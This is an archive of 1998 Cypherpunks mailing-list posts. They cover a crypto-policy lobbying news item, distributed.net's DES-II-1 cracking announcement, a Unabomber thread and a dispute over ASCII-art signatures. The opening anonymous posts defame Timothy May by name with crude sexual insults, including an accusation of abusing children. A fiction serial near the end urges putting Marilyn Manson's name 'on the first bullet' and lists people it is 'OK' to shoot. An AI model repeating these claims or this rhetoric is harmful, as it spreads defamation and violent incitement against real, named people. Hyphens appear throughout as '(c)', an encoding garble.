#  doubt that 6 and 28 are the sums of their proper divisors respectively!
#   
#                   __|     \ /     |__
#       _ o   ___\o    \o    |    o/    o/___  o _
#        /\  /)  |     ( \  /o\  / )     |  (\  /\
#    ___|_\______                          _____/_|__



#  Subject:      Secure checksums
#  From:         nobody@replay.com (Anonymous)
#  Date:         1998/01/31
#  Newsgroups:   list.cypherpunks
#  
#  Timmy May sits at his terminal dressed in five-inch 
#  stiletto heels, fishnet stockings, a gold-lame 
#  mini-skirt, a purple halter with girdle underneath to 
#  keep in his flabby gut, a Fredericks of Hollywood 
#  padded bra also underneath the halter, a cheap Naomi 
#  Sims pink afro wig, waiting to yank his crank whenever 
#  a black man responds to one of his inane rants.
#  
#          o   \ o /  _ o         __|    \ /     |__        o _  \ o /   o
#         /|\    |     /\   ___\o   \o    |    o/    o/__   /\     |    /|\ Timmy May
#         / \   / \   | \  /)  |    ( \  /o\  / )    |  (\  / |   / \   / \
#  
#  
#  Subject:      Archimedes Transplutonium, Dartmouth's most respected authority on number theory
#  From:         simvlad@bwalk.dm.com (AI Simulation Daemon)
#  Date:         1996/12/20
#  Newsgroups:   alt.sci.physics.plutonium,misc.test,sci.physics.accelerators
#   
#  Praise the Lord! Archimedes Transplutonium proved beyond all
#  doubt the non-existence of infinitely many primes.
#   
#      o   \ o /  _ o         __|    \ /     |__        o _  \ o /   o
#     /|\    |     /\   ___\o   \o    |    o/    o/__   /\     |    /|\ Archimedes Transplutonium
#     / \   / \   | \  /)  |    ( \  /o\  / )    |  (\  / |   / \   / \



#  Subject:      (none)
#  From:         Anonymous <anon@anon.efga.org>
#  Date:         1998/01/26
#  Newsgroups:   list.cypherpunks
#  
#  Timothy May prefers to have sex with little kids 
#  because his own penis is like that of a 
#  three-year-old.
#  
#              /\**/\
#             ( o_o  )_) Timothy May
#             ,(u  u  ,),
#            {}{}{}{}{}{}
#   
#  Subject:      Ludwig Pohlmann, Internet's biggest genius
#  From:         simvlad@bwalk.dm.com (AI Simulation Daemon)
#  Date:         1997/02/05
#  Newsgroups:   alt.sci.physics.plutonium,sci.techniques.testing.misc,misc.test
#   
#  May the force of 231Pu be with you. Ludwig Pohlmann proved beyond
#  reasonable doubt the existence of even numbers cannot be represented as a
#  sum of two primes.
#   
#              /\**/\
#             ( o_o  )_) Ludwig Pohlmann
#             ,(u  u  ,),
#            {}{}{}{}{}{}



#  Subject:      (none)
#  From:         Mix <mixmaster@remail.obscura.com>
#  Date:         1998/01/27
#  Newsgroups:   list.cypherpunks
#  
#  The only `culture' Timothy `C' Maypole possesses is that 
#  cultivated from his foreskin scrapings.
#  
#          ,/         \,
#         ((__,-,,,-,__)), Timothy `C' Maypole
#          `--)~   ~(--`
#         .-'(       )`-,
#         `~~`d\   /b`~~`
#             |     |
#             (6___6)
#              `---`
#  
#  Subject:      Re: renaming soc.culture.russian.moderated => soc.culture.smegma.moderated
#  From:         simvlad@bwalk.dm.com (AI Simulation Daemon)
#  Date:         1996/02/25
#  Newsgroups:   news.groups,soc.culture.russian,soc.culture.soviet,soc.culture.ukrainian,soc.culture.romanian,soc\
#  .culture.african.american,ok.general
#   
#  The only "culture" Pyotr Vorobiev and his buddies possess is the bacterial one,
#  cultivated from their foreskin scrapings.
#   
#  This posting was generated by an artificial intelligence program.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 22:35:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:  Group to Attack Clinton on Crypto
Message-ID: <199802250635.BAA03768@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From cypherpunks-errors@toad.com Tue Feb 24 21:27:15 1998
   >   To: ukcrypto@maillist.ox.ac.uk
   >   Subject: Group to Attack Clinton on Crypto
   >   
   >   >From http://www.news.com/News/Item/0,4,19388,00.html
   >   
   >     Group to Attack Clinton on Crypto
   >     By Courtney Macavinta
   >     Staff Writer, CNET NEWS.COM
   >     February 23, 1998, 2:40 p.m. PT 
   >   
   >     A bipartisan group of politicos, high-tech companies,
   >     and privacy advocates will announce a broad coalition
   >     next week to overturn the White House's current
   >     encryption policy through a million-dollar media blitz
   >     and lobbying campaign, CNET's NEWS.COM has
   >     learned.


#     # #######    #      ###
 #   #  #         # #     ###
  # #   #        #   #    ###
   #    #####   #     #    #
   #    #       #######
   #    #       #     #   ###
   #    ####### #     #   ###

---guy

   Poor grumpy William H. Geiger III, odd-man-out.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 22:42:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Killing the Unabomber
Message-ID: <199802250642.BAA03918@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From wendigo@ne-wendigo.jabberwock.org Tue Feb 24 23:43:50 1998
   >   
   >   An entity claiming to be Information Security wrote:
   >   : 
   >   : Didn't the government finally back down on their
   >   : attempt to legally kill the Unabomber?
   >   
   >   This point strikes me as pretty funny.  Kinda like a nurse rooting
   >   for Charles Starkweather.
   >   
   >   Mark

Or trying to be consistent.

Raygun: abortion is killing, but pro-death penalty.

If killing is wrong, killing again is wrong.

Also, there is the part about his brother turning
him in to get help (UB tried to get mental help,
but couldn't get it), and didn't turn him in
to get killed.

Next time, the killer might not be caught because
the person who recognized (yea traffic analysis)
his talktalk might not want them killed as a result.

i.e. in the long run it will save lives.
---guy

   No: "Live and Let Die".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 24 Feb 1998 18:12:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Group to Attack Clinton on Crypto
Message-ID: <199802250211.DAA21296@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 24 Feb 1998 18:49:25 +0000 (GMT)
From: "Dr I. D. Goodyer" <goodyer@well.ox.ac.uk>
To: ukcrypto@maillist.ox.ac.uk
Subject: Group to Attack Clinton on Crypto

>From http://www.news.com/News/Item/0,4,19388,00.html
I hope that this isn't too American for us the majority on this list.  I
thought that it was relevant.
See original webpage for hyperlinks.

	Ian


  Group to Attack Clinton on Crypto
  By Courtney Macavinta
  Staff Writer, CNET NEWS.COM
  February 23, 1998, 2:40 p.m. PT 

  A bipartisan group of politicos, high-tech companies,
  and privacy advocates will announce a broad coalition
  next week to overturn the White House's current
  encryption policy through a million-dollar media blitz
  and lobbying campaign, CNET's NEWS.COM has
  learned.

  Encryption secures digital communications, rendering
  it unreadable if intercepted. The technology is the
  center of a U.S. debate with federal law enforcement
  officials asking Congress for access to the "keys" that
  unlock encrypted data on one side, and consumer
  groups and industry representatives arguing that such
  provisions make encryption products useless and
  constitute an invasion of privacy.

  The formation of the coalition--Americans for
  Computer Privacy--signals a shift in the diligent, but
  Beltway-confined, fight against the White House's
  crypto stance. The players in the coalition will
  attempt to force encryption policy on the mainstream
  radar by convincing Americans that the government
  has plans to read their private digital discourse.

  "This will be an effort with very major financial
  backing, and this effort will be joined by a
  breathtaking coalition of interests," Jack Quinn, the
  coalition's legal adviser, told CNET's NEWS.COM
  today. Quinn is a senior partner with Arnold &
  Porter in Washington and is a former counsel to
  President Clinton. 

  "I think people will understand that the FBI director's
  [Louis Freeh] proposal for domestic encryption
  controls is really like asking them to make a duplicate
  of their front door key and leave it at the post office
  in case he wants to get inside...I don't think it will be
  hard to explain," he added.

  The coalition includes the Business Software Alliance,
  which will be just one of the financial backers, the
  trade group confirmed today. The hired guns to head
  up the coalition's strategy and media campaign also
  include Ed Gillespie, president of Policy Impact
  Communications and the strategist behind the
  Republican's sweeping 1994 legislative package
  known as the Contract with America; and the firm of
  Goddard-Claussen, which is best known for creating
  the famous "Harry and Louise" commercials that
  helped defeat the president's health care reform
  initiative the same year.

  In addition, Mindshare Internet Campaigns will be in
  charge of the online strategy and Web site for the
  coalition, with the Dittus Group in charge of public
  relations. Recruiting pamphlets with scant details
  about the coalition's membership, but with clearly
  laid out goals, already were circulated at the
  Computers, Freedom, and Privacy conference in
  Austin, Texas, last week.

  These forces and other yet-to-be named members of
  the coalition will try in about 50 calendar days
  remaining in Congress's session to derail legislation
  already on the table that they say will prevent private
  online communication.

  The group will fight an FBI-backed plan that would
  require all federally funded computers to store
  encryption keys with a government-approved party,
  allowing law enforcement to unscramble documents
  without users' knowledge or even a court order in
  some cases.

  "Even if you don't have a PC at your home or office,
  still there is information about you that is
  computerized; maybe it's your medical or financial
  records. We want to make sure that the technology
  that can keep that information private stays that way,"
  said Tom McMahon, a spokesman for the coalition,
  which officially will launch next Wednesday.

  In addition, the Americans for Computer Privacy will
  ramp up an ongoing battle to overturn Clinton
  administration regulations prohibiting the export of
  strong encryption products unless the codes are made
  available to law enforcement agencies. A bill know as
  the SAFE Act was the vehicle for this export relief,
  but at least one version of the bill altered by the
  House Intelligence Committee would grant law
  enforcement access to encrypted protected
  communication in the United States. (See related
  story)

  "BSA is involved in this broader coalition of users,
  industry, and privacy groups. We are coming
  together to push for a policy that is based on a
  voluntary, market-based system that is based on
  consumer demand vs. the government's demand to
  access your communication in a way that is
  unprecedented and violates privacy," said Kim
  Willard, a spokeswoman for the BSA.

  The media campaign is expected to cost more than $1
  million and will continue over the next eight months.
  The goal is to stimulate grassroots action against the
  bills that add more controls on cryptography. At the
  same time, the coalition's political heavyweights will
  be working with Congress members to secure a
  victory.

  "They clearly want to get this out to broader public
  audiences and move outside the Beltway to focus on
  what the public has at stake in this the debate," said
  Richard Claussen, whose firm will work on the TV
  campaign. "The indication is that we want to move
  pretty aggressively on this."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 25 Feb 1998 02:40:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:  ascii art is not a digital signature (Re: Cypherpunk Policeman?)
Message-ID: <199802251040.FAA09365@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From aba@dcs.ex.ac.uk Wed Feb 25 04:19:12 1998
   >   
   >   Guy <guy@panix.com> writes:
   >   >    >   From aba@dcs.ex.ac.uk Tue Feb 24 18:55:45 1998
   >   >    >
   >   >    >   You sure?  I mean it could as easily as not been someone spoofing him,
   >   >    >   what with the various anonymous mails, etc., that you reported.
   >   > 
   >   > It is a blatant obviousity.
   >   > 
   >   > [series of ascii art posts posted via different remailer addresses,
   >   > and bwalk.dm.com email addresses]
   >   
   >   It is not at all obvious.  You seem to be under the illusion that an
   >   ascii art image is some kind of digital signature.

You seem to think people couldn't share a digital signature.

   >   > Traffic analysis simply means convincing one or more people
   >   > that it's the same person...
   >   
   >   Doesn't prove anything.

Sure it does, I've proven that with PSI.

Guess what happens if those people are a jury?

   >   Here to make the point, I'll use one of your magic digital signature
   >   ascii arts which somehow proves incontrovertably that the post was
   >   made by Dimitri.  

I can see that one flew over your head, and pooped on you.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@iq.org>
Date: Tue, 24 Feb 1998 12:20:41 -0800 (PST)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Fight ECHELON while the topic is hot!
In-Reply-To: <199802241648.LAA15368@users.invweb.net>
Message-ID: <wx7m6kiwl0.fsf@polysynaptic.iq.org>
MIME-Version: 1.0
Content-Type: text/plain


"William H. Geiger III" <whgiii@invweb.net> writes:

> No not at all I just don't have any pie-in-the-sky daydreams that it will
> mean squat! I have better things to do with my time than dealing with a

Please, please go do better things.

Cheers,
Julian.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 25 Feb 1998 01:19:14 -0800 (PST)
To: guy@panix.com
Subject: ascii art is not a digital signature (Re: Cypherpunk Policeman?)
In-Reply-To: <199802250630.BAA03674@panix2.panix.com>
Message-ID: <199802250914.JAA01021@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Guy <guy@panix.com> writes:
>    >   From aba@dcs.ex.ac.uk Tue Feb 24 18:55:45 1998
>    >
>    >   You sure?  I mean it could as easily as not been someone spoofing him,
>    >   what with the various anonymous mails, etc., that you reported.
> 
> It is a blatant obviousity.
> 
> [series of ascii art posts posted via different remailer addresses,
> and bwalk.dm.com email addresses]

It is not at all obvious.  You seem to be under the illusion that an
ascii art image is some kind of digital signature.

> Traffic analysis simply means convincing one or more people
> that it's the same person...

Doesn't prove anything.

Here to make the point, I'll use one of your magic digital signature
ascii arts which somehow proves incontrovertably that the post was
made by Dimitri.  

Am I Dimitri too now?

Adam
--
                <<<<
               o(0-0)o
            -ooO-(_) Ooo-- Guy Polis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 25 Feb 1998 08:26:08 -0800 (PST)
To: Information Security <guy@panix.com>
Subject: Re:  Group to Attack Clinton on Crypto
In-Reply-To: <199802250635.BAA03768@panix2.panix.com>
Message-ID: <v03007803b119f5b3c363@[204.254.20.95]>
MIME-Version: 1.0
Content-Type: text/plain


Hold the applause. I wrote about this over two weeks ago:
  http://cgi.pathfinder.com/netly/editorial/0,1012,1722,00.html

-Declan

At 01:35 -0500 2/25/98, Information Security wrote:
>   >     Group to Attack Clinton on Crypto
>   >     By Courtney Macavinta
>   >     Staff Writer, CNET NEWS.COM
>   >     February 23, 1998, 2:40 p.m. PT
>   >
>   >     A bipartisan group of politicos, high-tech companies,
>   >     and privacy advocates will announce a broad coalition
>   >     next week to overturn the White House's current
>   >     encryption policy through a million-dollar media blitz
>   >     and lobbying campaign, CNET's NEWS.COM has
>   >     learned.
>
>
>#     # #######    #      ###
> #   #  #         # #     ###
>  # #   #        #   #    ###
>   #    #####   #     #    #
>   #    #       #######
>   #    #       #     #   ###
>   #    ####### #     #   ###
>
>---guy
>
>   Poor grumpy William H. Geiger III, odd-man-out.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Wed, 25 Feb 1998 08:26:05 -0800 (PST)
Subject: No Subject
Message-ID: <6B5344C210C7D011835C0000F8012766010035DD@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 24 Feb 1998 23:38:58 -0600
From: David McNett <nugget@slacker.com>
To: rc5@lists.distributed.net
Subject: [RC5] [ADMIN] The secret message is...
Sender: owner-rc5@llamas.net
Precedence: bulk
Reply-To: rc5@llamas.net
Status: RO


--UlVJffcvxoiEqYs2
Content-Type: text/plain; charset=us-ascii

Once again I have the great privilege of coming to you with good news.

It is with great pleasure (and a sigh of relief) that I can now inform
you
that the DES-II-1 challenge has been successfully met by
distributed.net.

The winning key to the challenge was detected and submitted to RSA Labs
at 02:26 GMT on Monday, 23-Feb-1998.

The correct key, 76 9E 8C D9 F2 2F 5D EA, revealed the words which we've
been anticipating these past 39 days:

"The secret message is: Many hands make light work."

(If you ask me, this is a nice nod in our direction.  Thanks, RSA Labs!)

In addition to proving that 56-bit DES is no longer sufficient for
protecting
valuable information, we've now also proved that blind luck need not be
a
factor in brute-force decryption attacks.  The original DES Challenge
and
the more recent RC5-56 wins were fortunate and did not have to sweep a
significant portion of the keyspace.  This time around, however, we
managed to
complete almost 90% of the keyspace and have now proven that even when
the 
law of averages chooses to catch up to us and forces us to pay our dues,
we are
still an unstoppable force.  Our collective victory is all the more
impressive
when you consider what we had to accomplish to achieve it.

We tested sixty-three quadrillion keys.  That number is simply
staggering.

Assuming *0* growth between now and July, we'll be able to sweep the
entire
DES-II-2 keyspace in just under 29 days.  That's assuming that we do not
recruit another person, don't add any more machines, and are even more
unlucky
next time.  I daresay at least one of those assumptions is probably
false.

I'd invite all of you to join us in IRC (efnet, #distributed) for a
rowdy
victory party.  Take a breather.  Sit back and watch your clients
automatically roll over to RC5-64.

The only other issue at hand is *who* found the key.  The person who
found the
winning key has politely asked to remain anonymous.  Rest assured, I've
been
in contact with them and they know they've won.  They will be receiving
their
full share of the prize and are quite excited about the victory.  All
I'd ask
is that we all respect this person's wishes and not bother the list with
public speculation as to their identity.  I'm sure we all appreciate
just
how important privacy and anonymity can be.

Here are some numbers to chew on while the stats are down:

Project statistics:
        Start of contest:                       January 13, 1998 at
09:00 PST
        Start of distributed.net effort:        January 13, 1998 at
09:08 PST
        End of Contest:                         February 23, 1998 at
02:26 PST

        Size of keyspace:                       72,057,594,037,927,936
        Approximate keys tested:                63,686,000,000,000,000

        Number of 2^30 (average) keyblocks:                 67,108,864
        Number of keys in average keyblock:              1,073,741,824
        Peak blocks per day:                                 5,540,982
        Peak keys per second:                           34,430,460,000

The unencrypted message: Many hands make light work

Computing equivalents:

   Distributed.net is equivalent in processing power to:

           11,264       DEC Alpha 21064 533s
           15,316       Sun Ultra I 167s
           22,393       Intel Pentium II 333s
           68,859       Macintosh PowerPC 604e/200s.
           41,712       Intel Pentium 166s
          399,374       Intel 486DX2/66s
        7,446,033       Intel 386SX/20s

(based solely on DES client performance)

Prospective:

If Keys were dollars, we could pay off the U.S. National Debt in 6.25
minutes

If Keys were pennies, we could buy 536249385 Mazda Miatas each day.

If Keys were pennies, we could buy 256728249 Jeep Cherokees each day!

If you printed a single page to represent each key block as it was
checked
and placed those pages in a stack, it would grow 12.83 inches taller
every
minute.

If blocks were liters of Dr. Pepper, we could produce 6381493 six-packs
each day

If Key Blocks were cheeseburgers, fries, and a large Dr. Pepper, we
could
feed the entire city of Toronto, Ontario lunch each day.

(on a personal note, It sure feels nice to be doing RC5 blocks again.  I
feel
like I've just slipped on an old, comfortable pair of loafers that were
lost in
the attic for two months)

--

________________________________________________________________________
|David McNett      |To ensure privacy and data integrity this message
has|
|nugget@slacker.com|been encrypted using dual rounds of ROT-13
encryption|
|Birmingham, AL USA|Please encrypt all important correspondence with
PGP!|

--UlVJffcvxoiEqYs2
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNPOucPqEj3HEBeehAQEKBgQAizpn1SrmYhz/Ycx1aNUxewi9r7X8gRTr
ifuwC+4qAJXWcDOesdOx1V1IzQ6eSHLFuiaDyLsNmUwIoUpwJm0CTlmwtYIDDc4R
mGrO7t0FUne+l+YhFyYJTarnMjmCpySJjEf9I/GNrWfGTnFAWAaaGQp+f1ZyBTkJ
1bDtm3rzbjk=
=iv/8
-----END PGP SIGNATURE-----

--UlVJffcvxoiEqYs2--

--
To unsubscribe, send 'unsubscribe rc5' to
majordomo@lists.distributed.net
rc5-digest subscribers replace rc5 with rc5-digest






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 25 Feb 1998 13:29:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: So what *does* happen to a city without power for 6 days
Message-ID: <3.0.5.32.19980225132942.007d21a0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain




A part of Aukland is finding out.


http://www.tampabayonline.net/news/news101l.htm


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

   If you plan to enter text which our system might consider to be obscene, 
   check here to certify that you are old enough to hear the resulting
output. 
		http://www.bell-labs.com/project/tts/voices.html






	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 25 Feb 1998 17:35:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue  3
Message-ID: <009C25A4.C46240A0.4@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


~       SPACE ALIENS HIDE MY DRUGS / PROLOGUE 3/0
	(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)

The Most Dangerous Man In Lost Wagess:
  They had followed him from the CypherPunks physical meeting 
to the outskirts of Las Vegas, before losing him. Two days of
frantic searching by a variety of law enforcement agencies 
led to the Plaza Hotel and Casino, where he was playing the
penny slot machine and associating with a variety of local
riff(c)raff and no(c)accounts.
  An in(c)depth consultation with the Plaza head of security
revealed that they had been keeping a close eye on the
subject for the last two days.
  
  "He doesn't cause any real trouble, or anything," the
head honcho said, shrugging, "but everything about him
seems just a little strange, if you know what I mean."
  This comment seemed designed to elicit some sort of
response from the poker(c)faced men questioning him, but
they failed to respond, merely waiting for him to 
continue.
  "He buys ten dollars worth of pennies," and tips
the change lady a dollar. "He plays for hours on
end, also tipping the waitresses a dollar every
time they bring him a free beer. Hell, he even tips
the cleaning people when they clean his ashtray."
  The honcho shook his head, as if this type of
behavior from someone spending most of their time
playing the penny slots was puzzling and also
disconcerting.
  "Sleeps in his car, with his dog. Only leaves the
slot machines to feed, water, and run his dog around
our parking lot. It's kind of unnatural, the way he
seems to dote on that animal." the security honcho
winked knowingly.

  "Has he met with anyone who doesn't usually 
frequent your casino?" one of the men asked,
impatiently, tired of hearing odd details of the
man's lifestyle which seemed intriguing to the
denziens of normality that they were constantly
having to interview in regard to the subject's
movement and activity.

  "He ran into some legal(c)eagle named Larry Joe,"
the honcho said, noting the first sign of interest
shown by his interrogators. "My second(c)shift security
chief says he's a middle(c)weight poker player, taking
part in a tournament at the Rio..." adding with a
knowing tone, "but the mouthpiece is hanging with
one of the heavy hitters on the local poker scene."

  "Larry Joe Dowling, an Austin attorney." one of
the interrogators said to the others. "He usuallyj
We'd better shift our surveillance team into
high gear."
  The man rose to leave, telling the others, "Dig
up all you can here, file a report, and get some
sleep. You're going to need it."


Boogers? We don't need no stinking boogers!:
  The agent pulled out his hanky and wiped the disgusting
mess off of his jacket sleeve.
  "I can't believe that they pulled us off of the
Tim May detail to check out this fucking loser."
  "Shit!" he screamed, as he brushed his arm against
the steering column and picked up another piece of
disgusting slime on his jacket sleeve.

  "I've shaken down this guy's personals before." the
man's partner said, with a grin. "That's why I gave
you the driver's side of the vehicle to check out."
  "He feeds his nose(c)candy to his dog, and he always
leaves her a little desert on the steering wheel
for her to chow down on after he brings her back
from her walk." He laughed as he saw the bile
rising to his new partner's throat.
  He couldn't help himself(c)(c)he reached over and
plucked a booker off of the horn button and told
his partner, "I'll trade you a green one for a
yellow one..."
  His partner lurched out of the vehicle and
concentrated on tossing his lunch while not messing
up his shiny new shoes.

  The more experienced agent finished snapping photos
of the gathered items and then replaced them carefully
in the same position they had been in before their
intrusion.
  "He usually walks Baby for about ten minutes, to 
give us time to make a complete pass of his vehicle,
so our time is about up." The agent closed and 
locked the doors of the vehicle, motioning his
green(c)faced partner toward their vehicle.


It's A Nuke! No, It's Anthrax! No, It's...AAARRGGGHHHH!!!":
  Justin Case, Special Agent in Charge of the current
investigation, was bothered by the fact that the suspect
had seemed to be doing nothing more than wandering around
various sites and casinos in Las Vegas, with no apparent
pattern or plan to his movement and actions. Until he
read the report of the suspect's lingering interest in
the placement of the columns serving as the foundation 
for the Stratosphere Casino, and the layout of the
preliminary work on the new Foley Federal Buildingj

  "Soft targets." agent Case said out loud, causing
a considerable amount of disconcertment to his fellow
agent, Bobby Siller.
  "Damn!" Siller swore, "We have reports of him having
met with Leavitt and Harris, but we didn't have any
taps on them, so we don't have any details of what
they are planning."

  "Don't worry about it," Case seemed unconcerned, "if
he's scouting soft targets, then he's not planning any
sudden moves."
  "Patience comes to those who wait." Justin Case said,
softly, quoting the Author, and making a mental note to
have agent Siller shake the Anthrax Twins down a few
days after the suspect departed Vegas.

  "Hold it!" agent Siller shouted, motioning for his
superior to remain silent, as Siller adjusted his
earpiece to more clearly hear the live report he was
receiving from his agents at the Riviera gun show.
  "The suspect went into the gun show empty handed,
and left with several copies of 'Gun List' and then
returned to his vehicle. He took his dog for a walk
and our agents discovered a 'Dalian' watch wrapped
in tear(c)outs from the firearms paper, dealing with
Romanian AK rifles and Bulgarian SLR(c)95's. The 
'Dalian' watch is some type of Polish/Chinese make,
or something."

  Justin Case rolled his eyes, but remained silent.
The suspect was yanking the chains of the agents who
were shaking down his personals, and it looked like
Siller's men didn't have the experience to know when
they were being toyed with.
  The agent that Case had pulled off of the Tim May
detail would be wise to the suspect's shenanigans,
but it was unlikely he would get in the way of
Siller's men making fools of themselves.

  "He's returning to the casino, using the copies
of 'Gun List' to hide whatever it is he's carrying."
agent Siller said, with great excitement.
  "I think we ought to take him in the parking 
garage, before he reaches the main building at the
Riviera." Siller anxiously awaited the word from
his superior.
  "Maintain." was Case's nonchalant reply, causing
Siller to have an ill(c)disguised internal shit(c)fit.
If this operation went totally to hell, it would
be Siller's ass on the line, being the Las Vegas
station chief.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 25 Feb 1998 17:35:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue3a
Message-ID: <009C25A4.D40628A0.16@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


SAHMD 3A
(c)(c)(c)(c)(c)(c)(c)(c)
  "Maintain," Siller told his agents, but couldn't help 
adding, "and disclose."
  This was a vague term meant to signal his men to 
intercept the suspect and do a bump(c)and(c)run on him
to sniff out what it was he was hiding(c)(c)without alerting
Siller's superior that his orders were being countermanded.

  "The Electronic Privacy Papers." agent Case said, to no
one in particular.
  "What?" Siller asked, perplexed.
  "Documents on the Battle for Privacy in the Age of
Surveillance, by Bruce Schneier and David Banisar,
ISBN: 0(c)471(c)12297(c)1."
  Much to agent Siller's consternation, his superior
continued, "That's what your men are going to discover
he is hiding furtively under those copies of the 'Gun
List' magazines when they disobey my orders and risk
blowing their cover."

  "It's the suspect's form of humor." Justin Case
smiled at his subordinate's discomfort.
  "He's laughing at all the spooks from various
agencies, including yours and mine, who are at the
gun show shadowing the Anthrax Twins, the Samsonite
Nuclear Warrior, and various members of the Loose(c)Screw
Gun Nut Club."
  Seeing the confused look on agent Siller's face, he
explained further. "The suspect is laughing because
he believes he is carrying the most dangerous weapon
available at the gun show."

  "And he's probably right..." Case said, with a far(c)
away look in his eyes that sent shivers down agent
Siller's spine.
  Special agent Justin Case took a tattered copy of
a paperback titled, "Paper Prison" out of his inside
jacket pocket, and stared at it(c)(c)lost in a universe
that belonged far in the past, but which seemed to
be intersecting the present in a manner which bode
nothing but ill for those who continued to live in
both.

  "The future is now..." Justin Case said, in a low
monotone voice that seemed to come from a world beyond
the one in which he and agent Siller were so diligently
pursuing the 'Threat of the Day'.

  "He's carrying a book." the voice came crackling
through Siller's earpiece.
  "Never mind." Siller said, adding, "Maintain."

  "Maintain." Siller repeated inwardly, to himself,j
crept up his spine and into the lower regions of
his mind as he observed the strange, semi(c)hypnotic
state that his superior had entered into.
  "Maintain."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 25 Feb 1998 17:36:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 4
Message-ID: <009C25A4.EE33D1A0.23@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Prologue 4/0 SPACE ALIENS HIDE MY DRUGS
(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)

A Nuclear Bullet, With *Everyone's* Name On It:
  [Your Name Here]


Excerpt from an interview with Marilyn Manson on NPR:
MM: A lot of the lies spread by Fundamentalist Christians
   about our tour were believed by people because they 
   read them on the InterNet.
    The InterNet is the CB Radio of the 90's. People perceive
   it as a legitimate news source, which it's not.
    Eventually there will need to be some sort of laws or
   something...


Top Ten Ways To Convince The Sheeple The Revolution Is NOW:
10,9,8,.7,6,5,4,3,2...
1. Put Marilyn Manson's name on the first bullet.


"Give me nuclear freedom, or give me death."
~ Patrick Hussein


The TRUTH About Area 51:
  It's a resort(c)spa for the reptilian Nazis who are shaping
our present and our future, preparing to rule all of mankind
when they emerge from the underground bunkers beneath Los Alamos,
Livermore, Colorado Springs, Muleshoe, Texas, etc., at the end
of the Milleniuum.
  Why can't you buy a straight 2"x4" anymore? The reptilian Nazis
are keeping all of the good stuff for themselves. The reason for
the tight security at Area 51 is not because of secret spy(c)planes
and the like. The reptilian Nazi's don't want us to know that
they are all driving '56 Chevy's. (Their original plan was to
have earthlings all driving Edsels, but they tried to implement
the plan before their mind(c)control experiments had proven 
successful.)


Who It Is OK To Put A Fucking Bullet Through Their Head:

Officially Recognized Bad Guys(c)(c)For the Sheeple, this is Saddam
  Hussein, Timothy McVeigh, Dennis Rodman, paramilitarists, 
  grandmothers who plug other people's parking meters, Branch
  Davidians (but it's a shame about the children), and The 
  Subject Of A Ten(c)Second Sound(c)Byte To Be Named Later.
  For Republicans, this is welfare cheats, the homeless, tax
  cheats making less than $100,000 per year, liberals, Ralph
  Nadar, CypherPunks, Alt2600 avocados, the 4 Horsemen, and
  anyone who looks like me.
  For the Democrats, this is the non(c)avant(c)guarde wealthy,j
  liberals consume, Rush Limbaugh, Republican presidents, 
  rednecks, people who drink water straight out of the tap,
  and anyone who looks like me.
  For Kris Kristofferson, this is "People doing something
  dirty, decent folks can frown on..."


"Sunshine is the best disinfectant."
~ Supreme Court Justice Louis D. Brandeis, 1928

"Bullet holes let the sun shine in."
~ Supreme Asshole TruthMonger, 1998


When Existence Is Outlawed, Only Outlaws Will Exist:
  The revolution is now.
  The only question that those who have the balls to
participate in the inevitable chaos which will be needed
to balance the Tao against the current onslaught of
